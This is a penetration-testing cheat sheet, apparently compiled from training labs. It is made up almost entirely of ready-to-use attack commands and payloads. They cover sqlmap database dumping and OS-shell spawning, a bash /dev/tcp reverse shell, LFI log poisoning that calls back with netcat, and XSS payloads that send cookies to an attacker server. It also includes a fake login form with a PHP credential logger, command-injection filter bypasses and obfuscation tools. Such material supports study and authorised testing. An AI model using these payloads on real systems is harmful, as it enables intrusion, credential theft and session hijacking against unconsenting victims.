sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --dump-format=HTML # specify the export format you want for the dump
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'" # Conditional enumeration
sqlmap -u "http://www.example.com/?id=1" --schema # Database schema enumeration
sqlmap -u "http://www.example.com/?id=1" --search -T user # Searching for data
sqlmap -u "http://www.example.com/?id=1" --passwords --batch # All Password enumeration and cracking
--all --batch # Tip: The '--all' switch in combination with the '--batch' switch, will automa(g)ically do the whole enumeration process on the target itself, and provide the entire enumeration details.
sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba # Check for DBA privileges
#FileRead
sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd" # Reading a local file
#FileWrite
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php" # Writing a file
#Spawning Shell
sqlmap -u "http://www.example.com/?id=1" --os-shell # Spawning an OS shell
SQLMAP - Webapp protections bypasses
# Anti-CSRF Token Bypass
sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"
# Unique Value Bypass
sqlmap -u "http://www.example.com/?id=1&rp=29125" --randomize=rp --batch -v 5 | grep URI
# Calculated Parameter Bypass
sqlmap -u "http://www.example.com/?id=1&h=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib; h=hashlib.md5(id).hexdigest()" --batch -v 5 | grep URI
# IP Address Concealing
--proxy (e.g. --proxy="socks4://177.39.187.70:33283")
--tor
# Skip heuristic detection of WAF/IPS protection
--skip-waf
# User-agent Blacklisting Bypass
--random-agent
# Tamper Scripts
--list-tampers
--tamper=between,randomcase
# Chunked transfer encoding (splits the POST body to evade keyword filters)
--chunked
SQLmap Tamper scripts
| Tamper Script | Description |
| --- | --- |
| `0eunion` | Replaces instances of UNION with e0UNION |
| `base64encode` | Base64-encodes all characters in a given payload |
| `between` | Replaces greater-than operator (`>`) with `NOT BETWEEN 0 AND #` and equals operator (`=`) with `BETWEEN # AND #` |
| `commalesslimit` | Replaces (MySQL) instances like `LIMIT M, N` with `LIMIT N OFFSET M` counterpart |
| `equaltolike` | Replaces all occurrences of equals operator (`=`) with `LIKE` counterpart |
| `halfversionedmorekeywords` | Adds (MySQL) versioned comment before each keyword |
| `modsecurityversioned` | Embraces complete query with (MySQL) versioned comment |
| `modsecurityzeroversioned` | Embraces complete query with (MySQL) zero-versioned comment |
| `percentage` | Adds a percentage sign (`%`) in front of each character (e.g. SELECT -> %S%E%L%E%C%T) |
| `plus2concat` | Replaces plus operator (`+`) with (MsSQL) function CONCAT() counterpart |
| `randomcase` | Replaces each keyword character with random case value (e.g. SELECT -> SEleCt) |
| `space2comment` | Replaces space character ( ) with comments (`/**/`) |
| `space2dash` | Replaces space character ( ) with a dash comment (`--`) followed by a random string and a new line (`\n`) |
| `space2hash` | Replaces (MySQL) instances of space character ( ) with a pound character (`#`) followed by a random string and a new line (`\n`) |
| `space2mssqlblank` | Replaces (MsSQL) instances of space character ( ) with a random blank character from a valid set of alternate characters |
| `space2plus` | Replaces space character ( ) with plus (`+`) |
| `space2randomblank` | Replaces space character ( ) with a random blank character from a valid set of alternate characters |
| `symboliclogical` | Replaces AND and OR logical operators with their symbolic counterparts (`&&` and `\|\|`) |
| `versionedkeywords` | Encloses each non-function keyword with (MySQL) versioned comment |
| `versionedmorekeywords` | Encloses each keyword with (MySQL) versioned comment |
To create a more stable reverse shell, use the following payload:
bash -c "bash -i >& /dev/tcp/{your_IP}/443 0>&1"
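Catch the callback with a listener on the port referenced in the payload (443 here):
Code: bash
sudo nc -lvnp 443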
Local File Include Vulnerability
Access Local Files via Local File Inclusion
Exploit local file inclusion vulnerabilities using direct HTTP requests:
http://unika.htb/index.php?page=../../../../../../../../../../windows/system32/drivers/etc/hosts
The inclusion occurs due to the include() function in PHP, where directory traversal allows unauthorized file access.
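The vulnerable pattern typically looks something like the sketch below (an assumed minimal example, not the actual unika.htb source):
Code: php
<?php
// The user-controlled 'page' parameter flows straight into include(),
// so ../ sequences let an attacker traverse out of the web root
include($_GET['page']);
?>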
LFI to RCE example
# Execute a command using curl with a POST request, leveraging LFI for log poisoning and RCE
curl -X POST "http://192.168.56.102/turing-bolo/bolo.php?bolo=/var/log/mail" --data "cmd=nc 192.168.56.101 4444 -e /bin/bash"
# Set up a listener for incoming connections on port 4444 using netcat
nc -nlvp 4444
# Perform a GET request using curl
curl -X GET http://192.168.56.102/turing-bolo/bolo.php?bolo=/var/log/mail
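For the log-poisoning step implied above, the mail log must already contain PHP. One common approach (a sketch only; the fields that actually get logged vary by mail server) is to connect over SMTP and plant PHP code in a field that gets written to /var/log/mail:
Code: bash
telnet 192.168.56.102 25
# Inside the SMTP session, even an invalid recipient is logged, PHP payload included:
# MAIL FROM: attacker@example.com
# RCPT TO: <?php echo system($_REQUEST['cmd']); ?>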
Cross Site Scripting (XSS)
XSS vulnerabilities take advantage of a flaw in user input sanitization to "write" JavaScript code to the page and execute it on the client side, leading to several types of attacks.
#Simple XSS test payloads to easily spot XSS vulns
<script>alert(window.origin)</script>
# Basic XSS payload to print something
<script>print()</script>
# steal document cookie
<script>alert(document.cookie)</script>
#Change background color
<script>document.body.style.background = "#141d2b"</script>
#Change Background Image
<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>
# Change Website title
<script>document.title = 'XSS Title'</script>
# Overwrite website's main body
<script>document.getElementsByTagName('body')[0].innerHTML = 'text'</script>
# Remove an HTML element
<script>document.getElementById('urlform').remove();</script>
# Load a script from our server
<script src="http://OUR_IP/script.js"></script>
# Send cookies to our server
<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>
# Website Defacing: Change the Title and an external image on the entire website via Body using inner HTML
<script>document.getElementsByTagName('body')[0].innerHTML = '<center><h1 style="color: white">Cyber Security Training</h1><p style="color: white">by <img src="https://academy.hackthebox.com/images/logo-htb.svg" height="25px" alt="HTB Academy"> </p></center>'</script>
#Try closing the existing tag first, then inject your script
'><script>alert(1)</script>
#Load a remote script
<script src=http://OUR_IP/fullname.js></script>
#If we don't know which field is vulnerable, we can try blind XSS and see if we get a request to our webserver
<script src=http://OUR_IP/fullname></script> #this goes inside the full-name field
<script src=http://OUR_IP/username></script> #this goes inside the username field
XSS for a phishing attack simulation
#Example of an XSS payload with a login form that sends the results to your webserver; this replaces the entire body with the HTML code below
#Change the IP/PORT to your server
XSS='><script>document.getElementsByTagName('body')[0].innerHTML = '<h3>Please login to continue</h3><form action=http://10.10.14.125:4444><input type="username"name="username"placeholder="Username"><input type="password"name="password"placeholder="Password"><input type="submit" name="submit" value="Login"></form>'</script>
'><script>document.write('<h3>Please login to continue</h3><form action=http://10.10.14.125:4444><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');</script>
To return the victim to the original page and reduce suspicion, we can host a PHP page on our webserver. Example PHP code that we can place under /tmp/tmpserver/ and call index.php (don't forget to change SERVER_IP to the website or IP that you are testing):
<?php
if (isset($_GET['username']) && isset($_GET['password'])) {
    $file = fopen("creds.txt", "a+");
    fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
    header("Location: http://SERVER_IP/phishing/index.php");
    fclose($file);
    exit();
}
?>
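Serve the page with PHP's built-in web server from that directory; a minimal sketch:
Code: bash
cd /tmp/tmpserver
sudo php -S 0.0.0.0:80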
Reflected XSS into attribute with angle brackets HTML-encoded
When the angle brackets are HTML-encoded and escaped, break out of the attribute instead:
'" autofocus onfocus=alert(1) x="''
" onmouseover"=alert(2)
Reflected XSS into a JavaScript string with angle brackets HTML encoded
//Consider the following javascript
<script>
var searchTerms = ''+alert(1)+'';
document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">');
</script>
//We break out of the JavaScript string by closing the quote and concatenating the alert(1) payload
'+alert(1)+'
Stored XSS into anchor href attribute with double quotes HTML-encoded
<a id="author" href="javascript:alert();">Controllable Attacker Input</a>
javascript:alert();
XSS for session hijacking
If we identify XSS, we can use it to steal user's cookies with the following example approach.
Host a PHP script on your webserver that captures a parameter and saves its content to a file:
<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>
Inject one of the following payloads to steal the user's cookies through XSS
<script>new Image().src="http://localhost/cookie.php?c="+document.cookie;</script>
If the XSS is successful, we will receive the user's cookies in the cookies.txt file
cat cookies.txt
Victim IP: 10.10.10.1 | Cookie: cookie=f904f93c949d19d870911bf8b05fe7b2
Javascript cookie grabber
document.location='http://OUR_IP/index.php?c='+document.cookie;
<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie;</script>
DOM XSS
While reflected XSS sends the input data to the back-end server through HTTP requests, DOM XSS is completely processed on the client side through JavaScript. DOM XSS occurs when JavaScript is used to change the page source through the Document Object Model (DOM). If the parameter appears after a "#" in the URL, as in http://SERVER_IP:PORT/#task=<img src=..., it is never sent to the server and is instead processed client-side by JavaScript through the DOM.
//DOM-Based XSS
<img src="" onerror=alert(window.origin)>
<img src="" onerror=alert(document.cookie)>
#"><img src=/ onerror=alert(2)>
// DOM XSS in jQuery selector sink using a hashchange event
<iframe src="https://0a86004c037f1eee82a9063700e500af.web-security-academy.net/#" onload="this.src+='<img src=1 onerror=print()>'"></iframe>
JQuery vulnerable code - DOM XSS
<script>
$(window).on('hashchange', function(){
    var post = $('section.blog-list h2:contains(' + decodeURIComponent(window.location.hash.slice(1)) + ')');
    if (post) post.get(0).scrollIntoView();
});
</script>
Executing stuff inside the href attribute
//Executing stuff inside href attribute
javascript:alert(1)
XSStrike
XSStrike is a powerful Python tool that automates the detection of XSS vulnerabilities in parameters:
git clone https://github.com/s0md3v/XSStrike.git
cd XSStrike
pip install -r requirements.txt
python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test"
If you get an error from Python when you try to install the requirements, you might need to create a virtual environment, which allows you to manage Python packages independently of the system Python:
sudo apt install python3-venv
python3 -m venv xsstrike-env
source xsstrike-env/bin/activate
pip install -r requirements.txt
Other useful resources with interesting XSS payloads:
Command injections
Injection Operators
| Injection Operator | Injection Character | URL-Encoded Character | Executed Part |
| --- | --- | --- | --- |
| Semicolon | `;` | `%3b` | Both |
| New Line | `\n` | `%0a` | Both |
| Background | `&` | `%26` | Both (second output generally shown first) |
| Pipe | `\|` | `%7c` | Both (second output is shown) |
| AND | `&&` | `%26%26` | Both (only if first succeeds) |
| OR | `\|\|` | `%7c%7c` | Second (only if first fails) |
| Sub-Shell | ``` `` ``` | `%60%60` | Both (Linux-only) |
| Sub-Shell | `$()` | `%24%28%29` | Both (Linux-only) |
Linux
Filtered Character Bypass
# Can be used to view all environment variables
printenv
# Using tabs instead of spaces
%09
# Example, using tabs for spaces and URL encoded %0a for new line
ip=127.0.0.1%0a%09ls%09-la
# Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. $())
${IFS}
# Example: spaces replaced with ${IFS}:
127.0.0.1%0a${IFS}ls${IFS}-la
# Commas will be replaced with spaces
{ls,-la}
# Will be replaced with /
${PATH:0:1}
# Will be replaced with ;
${LS_COLORS:10:1}
# Shift character by one ([ -> \)
$(tr '!-}' '"-~'<<<[)
Blacklisted Command Bypass
# Total must be even
' or "
# Linux only
$@ or \
# Execute command regardless of cases, replaces all upper-cases with lower case characters
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
# Another variation of the technique
$(a="WhOaMi";printf %s "${a,,}")
# Reverse a string
echo 'whoami' | rev
# Execute reversed command
$(rev<<<'imaohw')
# Encode a string with base64
echo -n 'cat /etc/passwd | grep 33' | base64
# Execute b64 encoded string, using <<< to avoid using a pipe | if filtered by the waf
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
Windows
Filtered Character Bypass
# Can be used to view all environment variables - (PowerShell)
Get-ChildItem Env:
# Using tabs instead of spaces
# %09
# Will be replaced with a space - (CMD)
%PROGRAMFILES:~10,-5%
# Will be replaced with a space - (PowerShell)
$env:PROGRAMFILES[10]
Other Characters
# Will be replaced with \ - (CMD)
%HOMEPATH:~0,-17%
# Will be replaced with \ - (PowerShell)
$env:HOMEPATH[0]
Blacklisted Command Bypass
# Total must be even
' or "
# Windows only (CMD)
^
# Simply send the character with odd cases
WhoAmi
# Reverse a string
"whoami"[-1..-20] -join ''
# Execute reversed command
iex "$('imaohw'[-1..-20] -join '')"
# Encode a string with base64
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))
# Execute b64 encoded string
iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
Evasion Tools (Bash commands Obfuscators)
Linux
Bashfuscator: Once we have the tool set up, we can start using it from the ./bashfuscator/bin/ directory. There are many flags we can use with the tool to fine-tune our final obfuscated command, as we can see in the -h help menu.
git clone https://github.com/Bashfuscator/Bashfuscator
cd Bashfuscator
pip3 install setuptools==65
python3 setup.py install --user
# Usage examples
./bashfuscator -c 'cat /etc/passwd'
./bashfuscator -c 'cat /etc/passwd' -s 1 -t 1 --no-mangling --layers 1
[+] Mutators used: Token/ForCode
[+] Payload:
eval "$(W0=(w \ t e c p s a \/ d);for Ll in 4 7 2 1 8 3 2 4 8 5 7 6 6 0 9;{ printf %s "${W0[$Ll]}";};)"
[+] Payload size: 104 characters
#Test the payload with bash -c ...
bash -c 'eval "$(W0=(w \ t e c p s a \/ d);for Ll in 4 7 2 1 8 3 2 4 8 5 7 6 6 0 9;{ printf %s "${W0[$Ll]}";};)"'
root:x:0:0:root:/root:/bin/bash
...SNIP...
Windows
DOSfuscation: There is also a very similar tool that we can use for Windows called DOSfuscation. Unlike Bashfuscator, this is an interactive tool: we run it once and interact with it to get the desired obfuscated command. We can once again clone the tool from GitHub and then invoke it through PowerShell, as follows:
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation
Invoke-DOSfuscation> help
HELP MENU :: Available options shown below:
[*] Tutorial of how to use this tool TUTORIAL
...SNIP...
Choose one of the below options:
[*] BINARY Obfuscated binary syntax for cmd.exe & powershell.exe
[*] ENCODING Environment variable encoding
[*] PAYLOAD Obfuscated payload via DOSfuscation
# Usage example
SET COMMAND type C:\Users\htb-student\Desktop\flag.txt
encoding
1
...SNIP...
Result:
typ%TEMP:~-3,-2% %CommonProgramFiles:~17,-11%:\Users\h%TMP:~-13,-12%b-stu%SystemRoot:~-4,-3%ent%TMP:~-19,-18%%ALLUSERSPROFILE:~-4,-3%esktop\flag.%TMP:~-13,-12%xt
Resources